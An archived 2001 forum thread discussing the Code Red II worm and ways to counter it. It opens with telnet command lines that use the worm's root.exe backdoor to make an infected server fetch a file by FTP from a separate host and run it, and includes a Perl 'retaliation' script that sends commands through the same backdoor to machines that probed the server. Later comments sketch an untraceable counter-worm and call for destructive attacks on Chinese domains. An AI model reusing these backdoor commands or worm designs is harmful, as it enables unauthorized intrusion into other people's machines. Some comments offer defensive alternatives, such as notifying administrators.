echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3etmpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfile+$FTP+%3edlfile%2ecmd | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80

Argh. What a pain. Why can't K5 have a "plain text" option which recognizes HTML tags but doesn't require the insertion of P and BR tags? Am I missing something?


Half-Empty: A global community of thoughts ideas and knowledge.

Nice try (none / 0) (#145)
by Mulad on Sat Aug 11, 2001 at 01:02:26 PM EST

Hmm. Nice try, but you need to have two newlines at the end of HTTP commands, not just one.

[ Parent ]
The real fear (2.66 / 3) (#110)
by neier on Thu Aug 09, 2001 at 05:14:50 AM EST

I've had a couple of random thoughts on CRII.

Has anyone realized the potential for script kiddies to use the root.exe as a gateway to make even more and more copies (of indeterminate names) in the web root directory? Yeah, the CRII patches all remove root.exe; but what about any other copies that have been made before the inoculation ??

Another thought -- in order to promote compatibility with the Windows people, shouldn't everyone running Apache redirect default.ida to a cgi-script that makes HTTP requests to seven randomly chosen hosts? I mean, standards are standards... :-)

Re: The real fear (none / 0) (#111)
by erlando on Thu Aug 09, 2001 at 05:59:47 AM EST

Has anyone realized the potential for script kiddies to use the root.exe as a gateway to make even more and more copies (of indeterminate names) in the web root directory? Yeah, the CRII patches all remove root.exe; but what about any other copies that have been made before the inoculation ??

That's exactly why everyone writes "The server is to be considered totally compromised and should be reformatted after removing data (not executables)" or words to that effect in their security advisories.

Removing root.exe doesn't quite cut it either. To close the backdoor you also need to remove the virtual directories mapping c: and d: and re-enable file-protection. Amongst other things.

Of course none of this would have been necessary if everyone heeded the advisories.. ;o)

[ Parent ]
Re: The real fear (none / 0) (#113)
by neier on Thu Aug 09, 2001 at 09:15:21 AM EST

Heh. Any guess on the number of people who actually follow through to the "format your hard drive" step of the remedy? After all these are the same ones who couldn't be bothered to download an IIS update....

As an aside, yesterday CRII found its way inside our firewall at work (large multinational). I applaud our IT staff's warning, as it hit my in-box at about the same time the first default.ida was showing up in our local apache log file; but their remedy only involved patches and reboots. I don't recall seeing a format (or even a mass deletion) mentioned anywhere. Of course, I wasn't paying too close attention; but "format" is a word I think I would remember. ;-)

[ Parent ]

my idea... but I don't have time/skill to implement (3.00 / 1) (#114)
by chutzpah on Thu Aug 09, 2001 at 11:08:30 AM EST

I am not a windows programmer, and I don't have the time or drive to learn, but my theory for this is:

make a worm that would listen for code red exploit attempts and when it detects one, connect to the machine that tried the exploit, install itself on the machine using the hole that code red uses, then proceed to eliminate code red II from memory, registry and disk (cleaning up all the damage it does) then disable IIS, putting itself in the boot procedure to keep IIS off until it is patched. Then proceed to listen for code red attempts, propagating itself to any machines that it finds.

This could eliminate the code red problem fairly quickly and will not create another problem with another worm because it is a passive worm rather than an active one.

Another thing that could help is if someone wrote a mod for apache to make it send the anti-code red worm to any machines that try to propagate code red.

CoreWars anyone? (3.00 / 1) (#115)
by DigitalQuartz on Thu Aug 09, 2001 at 11:08:59 AM EST

Anyone remember that old game CoreWars where you'd write viruses in pseudo-asm and then let them battle it out? :)

What you need to do is nab the source for code red, re-write it so that when it infects a system, it nukes other copies of code red running, and patches the system, and then tries to infect other machines for a limited time. But, as we learned in CoreWars, you need to make your virus more effective than the original code-red. Since it patches the system, it prevents code-red from re-infecting the system, so eventually you should kill off code-red.

The only thing I can think of wrong with this is that there's some ethical implications involved in patching someone else's machine. There may be someone out there somewhere with a perfectly legitimate reason for not patching their machine with the M$ patch (although I can't think of one, and I suppose their machine would just be contributing to the problem...)


A Less Illegal Action (4.00 / 2) (#117)
by cwalsh on Thu Aug 09, 2001 at 11:43:27 AM EST

There's been all this talk about going around and remote administrating these infected boxes. The problem, that has already been discussed to death, is that it's ethically questionable and very illegal to do so.

So what are we supposed to do? Sit around and wait for these lazy wankers to not fix their systems, and bring about the End Of The Internet(tm)?

Our Apache logs are filled with all of these lovely IP addresses of the infected machines. Why not attempt to send a friendly email to the administrator address of the box? Sure, not all of these machines are running email services, and the administrator might get offended at your telling them that they don't know what's happening on their machine, but then again, you probably wouldn't end up in jail because of an innocent email. Hell, I mean, if someone was unintentionally pointing a gun in your direction, wouldn't you tell them to stop pointing it at you and that they should read up on proper gun safety? (sorry for this possibly poor analogy, but it's the best I could do without coffee :)

I see at least two problems arising from this:
  • Autospam: If 50 people's computers all automatically send email to a single infected machine, it would probably anger the admin.
  • "Don't Tell Me How To Admin!": We get a whole lot of angry admins who don't like you anymore
A possible solution for point one would be to set up a sort of distributed.net style system, whereby a client side program, monitoring Port 80/the Apache log files would send a list of Code Red IPs to a central database. Any not in the database are added, and it's the client's responsibility to email those machines.

For point two, just word the boilerplate email in a very friendly, sort of, "Just in case you didn't know" manner. Hopefully this would defuse any potential tempers.

Anyways, that's it. I know it's probably a crazy idea, but I think it's certainly a damn sight better than inaction, and much less invasive than creating a "Code Blue". Regardless, if anyone thinks this is workable, go nuts, my idea is your idea, and all that.

Colin

Or you could... (5.00 / 2) (#119)
by Garc on Thu Aug 09, 2001 at 12:22:58 PM EST

do "grep default.ida /apache/ | mail -s 'APACHE' logredalert@dsheild.org". As you can read about here, they hope to contact the admins of the machines. Sending them to dsheild ensures that there will be minimal duplication and that the messages will be professional, courteous and informative.

garc
--
Tomorrow is going to be wonderful because tonight I do not understand anything. -- Niels Bohr
[ Parent ]

Scary... (3.00 / 1) (#125)
by univgeek on Thu Aug 09, 2001 at 04:07:05 PM EST

I am not a Comp expert...

But is there really no way to stop IIS alone or something? What if they were running some other processes on these systems? Why should every process be killed because you want to stop the machine from propagating CR II?

I would think that a saner reaction would be to maybe disable the access for that process, or maybe block 80 for the machine.

Maybe what I am saying is too difficult. But it seems to me, to be pretty scary thinking of any critical processes running on these systems.

Although any one running any critical processes on IIS and leaving it unpatched is asking for it.


Arguing with an Electrical Engineer is like wrestling with a pig in mud, after a while you realise the pig is enjoying it!

For those that want to.... (4.00 / 4) (#127)
by impto on Thu Aug 09, 2001 at 05:16:44 PM EST

http://www.dynwebdev.com/codered/

is the url for a GPL'd script that does just as we have been discussing here. It is written in Java and is available in *nix and Windows varieties. The JRE2 is required.

If ethics and legal disregard allow, download and use at your own risk.

impto

Something like this.... (4.00 / 2) (#131)
by mtl on Fri Aug 10, 2001 at 08:27:39 AM EST

1. Create a fifo, mknod /var/log/apache/apache.fifo
2. Make apache send its access logs to it
`CustomLog /var/log/apache/apache.fifo common'
3. Run the following perl.

#!/usr/bin/perl -w
#
# Script to retaliate against Code Red Attacks

use Socket;

$fifo = "/var/log/apache/apache.fifo";
$httplogfile = "/var/log/apache/access.log";
$wormlogfile = "/var/log/apache/codered.log";
$win_commandA = "GET /scripts/root.exe?+%2fc+net+send+*+Your+Machine+";
$win_commandB = "+is+infected+with+the+CODE+RED+Worm.Your+machine+has+just+tried+to+attack+mine.+You+should+shutdown+IIS+and+install+the+patches+available+from+Microsoft+or+better+still+install+Linux";

#
# Shouldn't need to do anything below here
#

open (FILE, "<".$fifo) or die "cant open fifo";

while (10 > 1){
while (<FILE>){
&httplog;

if ($_ =~ m/default.ida/){
$ip = ((split " ", $_)[0]);
open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile";
&logit;
&attack;
close LOGFILE;
}
}
}

# Will never get here
close FILE;
exit 0;

sub httplog {
# create normal http log
open (HTTPLOG, ">>".$httplogfile) or die "cant open http logfile";
print HTTPLOG $_;
close HTTPLOG;
}

sub logit {
# Log compromised machine
$date = ((split " ", $_)[3]);
print LOGFILE $date," - ",$ip," - ";
return 1;
}

sub attack {
# Attack compromised machine
print LOGFILE "Attacking ... ";
local $proto = getprotobyname('tcp');
socket(osock, PF_INET, SOCK_STREAM, $proto);
local $sin = sockaddr_in(80, inet_aton($ip));
connect(osock,$sin) or &attack_failed;
print osock $win_commandA.$ip.$win_commandB;
close (osock);
print LOGFILE "done\n";
return 1;
}

sub attack_failed {
# If Attack Fails
open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile";
print LOGFILE "connection refused\n";
close LOGFILE;
return 1;
}
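
The log-reading half of the pipeline above (take each access-log line, pick out the default.ida hits, record the source address) is the part worth keeping, and it combines naturally with cwalsh's notification scheme from comment #117: dedupe the addresses against a shared "already reported" set and draft a friendly note for a human to send, or forward to a clearing house such as the DShield address Garc quotes. The block below is an added example, not code from mtl, cwalsh or the thread; the log lines, the host name www.example.org and the notice wording are constructed, and it never connects back to the probing host.

```python
"""Triage Apache access logs for Code Red probes and draft notices to their operators.

Added, defender-side example; not code from the thread. It reads only the log
lines the worm already left on our own server and writes text for a human to
send. It never connects back to the probing host.
"""
import re
from ipaddress import ip_address

# Constructed Apache common-format log lines; no real capture was used.
SAMPLE_LOG = """\
10.0.0.7 - - [09/Aug/2001:05:14:50 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 404 285
10.0.0.7 - - [09/Aug/2001:05:15:02 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 404 285
192.0.2.33 - - [09/Aug/2001:05:16:11 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 HTTP/1.0" 404 285
192.0.2.9 - - [09/Aug/2001:05:17:40 -0500] "GET /index.html HTTP/1.1" 200 1043
198.51.100.4 - - [09/Aug/2001:05:18:03 -0500] "GET /default.ida HTTP/1.0" 404 285
not-a-log-line
"""

# client ident user [timestamp] "METHOD PATH PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')


def classify(path):
    """Name the worm family a request path matches, or None for ordinary traffic.

    Code Red I padded its request with N's, Code Red II with X's; anything
    else aimed at /default.ida is reported as an unclassified probe.
    """
    if not path.lower().startswith("/default.ida"):
        return None
    query = path.partition("?")[2]
    if query.startswith("XXXX"):
        return "Code Red II"
    if query.startswith("NNNN"):
        return "Code Red I"
    return "unclassified default.ida probe"


def triage(log_text, seen):
    """Summarise probing hosts not already in `seen`, then add them to it.

    `seen` plays the part of the shared database cwalsh proposed: each host
    is reported once, however many of our servers it probed.
    """
    report = {}
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue   # garbage or an unexpected format; skip rather than guess
        client, stamp, _method, path, _status = match.groups()
        family = classify(path)
        if family is None or client in seen:
            continue
        try:
            ip_address(client)   # only literal addresses are worth a notice
        except ValueError:
            continue
        entry = report.setdefault(client, {"variant": family, "hits": 0, "first_seen": stamp})
        entry["hits"] += 1
        if entry["variant"].startswith("unclassified") and not family.startswith("unclassified"):
            entry["variant"] = family   # a later, recognisable payload wins
    seen.update(report)
    return report


def draft_notice(client, entry, our_host="www.example.org"):
    """Plain-text notice in the friendly "just in case you didn't know" tone."""
    return (
        f"Subject: Code Red probes received from {client}\n\n"
        f"Hello,\n\n"
        f"Starting {entry['first_seen']}, {our_host} logged {entry['hits']} request(s) "
        f"for /default.ida from {client}. That request pattern is the {entry['variant']} "
        f"worm probing for unpatched IIS servers, so {client} is most likely infected "
        f"and you may not know it.\n\n"
        f"Please treat the host as compromised and see http://www.incidents.org for "
        f"the Microsoft patch and cleanup steps.\n\n"
        f"Regards,\n{our_host} webmaster\n"
    )


if __name__ == "__main__":
    seen_hosts = set()
    for host, details in triage(SAMPLE_LOG, seen_hosts).items():
        print(draft_notice(host, details))
```

Feeding it the fifo from step 1 instead of SAMPLE_LOG is a matter of reading lines from the fifo in a loop; the `seen` set would then be persisted (or replaced by the central database) so that a host probing several participants still gets one message.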



"Attacking"? (none / 0) (#133)
by SEWilco on Fri Aug 10, 2001 at 11:06:15 AM EST

Your code has an attack function. Is it an attack when you're only issuing a warning? You happen to be issuing the warning only to machines which are infected with Code Red II.

[ Parent ]
I would but... (3.00 / 1) (#134)
by IOrdy on Fri Aug 10, 2001 at 11:09:08 AM EST

I would but... I'm busy as a bee hacking apt-get source so I can 'apt-get porn' from my local mirror :)

My wrist got sore so I stopped for a bit... hacking that is, damn you k5 people are crude.


www.iordy.com

Lesbian: porn-get into it (none / 0) (#137)
by kataklyst on Fri Aug 10, 2001 at 01:15:36 PM EST

There is already a project frighteningly similar to your idea.

And yes, it actually works.

[ Parent ]

fixmyiis.com (5.00 / 1) (#135)
by shumacher on Fri Aug 10, 2001 at 12:35:29 PM EST

What if you created a website where people could connect, and have your anti code-red script launched? Offer to launch the script from any of the following actions:

  • Clicking a button at the website.
  • Sending an email.

Configure it so the emails and web page clicks request a script called default.ida, which gets the requesting ip, and launches your anti-worm.

Sure, it's not much different from an ethical standpoint, but if someone requests that you repair their damage, why not oblige? If their system is so poorly configured that they can't prevent it from making spurious requests for your services, how is that your fault?

When you can balance a tack hammer on your head, you can head off your foes with a balanced attack.

Nice idea, but... (none / 0) (#151)
by adamwood on Sun Aug 12, 2001 at 06:51:22 PM EST

...the problem is that once a system has been totally compromised, then simply fixing the .ida exploit won't make the server safe (and a 100% accurate "is there a backdoor" scanner isn't exactly possible)

[ Parent ]
No problem (none / 0) (#156)
by mrogers on Thu Aug 16, 2001 at 01:06:56 PM EST

No problem - the web page could inform you if you've been infected using a popup window rather than disinfecting you.

[ Parent ]
Untraceable worm-fixing-worm (5.00 / 1) (#139)
by sab39 on Fri Aug 10, 2001 at 02:28:48 PM EST

Here's how to write one that's pretty untraceable. I don't have the first clue as to how to do this, but I wouldn't be sad if someone did.

Step 1: Write code that uses the original code red hole to get in, kills running code-red processes, installs a piece of code, and then sets up that piece of code as the handler for *.ida by IIS. This piece of code should then look at the request and determine whether or not it is an attack. If it is, insert the same code into the attacking machine. If it isn't, pass it through to the original .ida handler with the argument truncated to a safe length. The code should also maintain a counter and only disinfect a fixed number of machines (say 20) before shutting down and going permanently into passive mode (truncate the argument and then pass it to the original handler). By doing this, you're almost guaranteed to not actually be doing any harm (the only thing you change is the ida handler, and you still pass through legitimate requests to that handler). This code should be thoroughly tested on all variants of machine that are vulnerable to code red.
Step 2: Write a variant of the main loop for this script which does the following:
a) Maintains a counter of the "depth" it's at.
b) Installs itself as the .ida handler.
c) Installs itself on a maximum of three other machines, with the "depth" incremented. Prefers machines far away in IP-space, but is random to some extent.
d) After it has installed on three other machines, deletes itself as untraceably as possible (removes itself from handling .ida, then removes its own code).
e) If the depth is >8, installs the script from step 1 instead (most of the code would be common; the modified main loop would never be transmitted past depth 8).
f) Deletes itself regardless of having infected any other machines if a certain time passes.
g) Doesn't shut down code red or do anything else that would advertise its presence.

This will essentially "seed" the "Code Blue" worm at 3^8 random points 8 jumps away from the original starting point. By the time it starts shutting down code red (and therefore being noticed) all the original vector machines will have the seeding virus well and truly wiped. The only indication of it ever having been there will be hits in some webserver log file, indistinguishable from the zillions of other code red hits. Considering that code red itself can't be traced, this would be even more untraceable.

I don't recommend being the person to write this. Even if I had the skills to do so, I probably wouldn't - I have too much to lose if I'm wrong and there is a way to trace it. But I hope that someone does something about code red, and something like this is really the only way - obviously the admins aren't going to. And when that person does, I hope that they do something untraceable like this, because I'd hate to see them suffer for it.
--
"Forty-two" -- Deep Thought
"Quinze" -- Amélie

Software (5.00 / 1) (#141)
by tompjfan on Fri Aug 10, 2001 at 04:36:36 PM EST

The obvious piece of software for the worm to install would be Apache of course.

Code black (none / 0) (#146)
by shokk on Sat Aug 11, 2001 at 01:06:32 PM EST

How long do we sit back and watch this stuff come out of the .cn domain? How long until we start throwing these types of things into their domain and doing some serious damage. I want to start hitting back and seeing some downtime on their end. How about a competition to see how deep someone can make their way into the .cn and delete and disable? They get to have some progress while letting their crackers hamper our productivity - albeit because of security unconscious server companies and lazy admins? I don't think so. First fix the server, next fix the admins, then fix their wagons.
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
ehm..... (none / 0) (#150)
by tSB on Sun Aug 12, 2001 at 10:27:29 AM EST

Removing Code Red is all well and good, but what about any backdoors that any script kiddies may have installed?

Better to simply let the admin know what's going on.

how do you stop IIS when it won't talk to you? (none / 0) (#152)
by janra on Mon Aug 13, 2001 at 09:02:16 PM EST

I've had a version of the perl cgi (posted here) running on my server for a while, and I added a couple of very simplistic tests to see if the shutdown command worked or not, and why. It didn't.

Basically, I requested "/" before and after attempting to shut down IIS, to see if there was any difference and if the connection could be made at all. Every single infected server that has hit my default.ida script either tested as a '404' (/c/winnt/system32/cmd.exe not found) or as not having shut down, even though the script found cmd.exe.

After looking at the "/" page of a few of those computers myself, I almost invariably get the IIS "403.9" response (too many users are connected) which would explain why my commands aren't getting through. So how the heck do you get to an IIS server when it's replying with "403.9"?


--
Discuss the art and craft of writing
That's the problem with world domination... Nobody is willing to wait for it anymore, work slowly towards it, drink more and enjoy the ride more.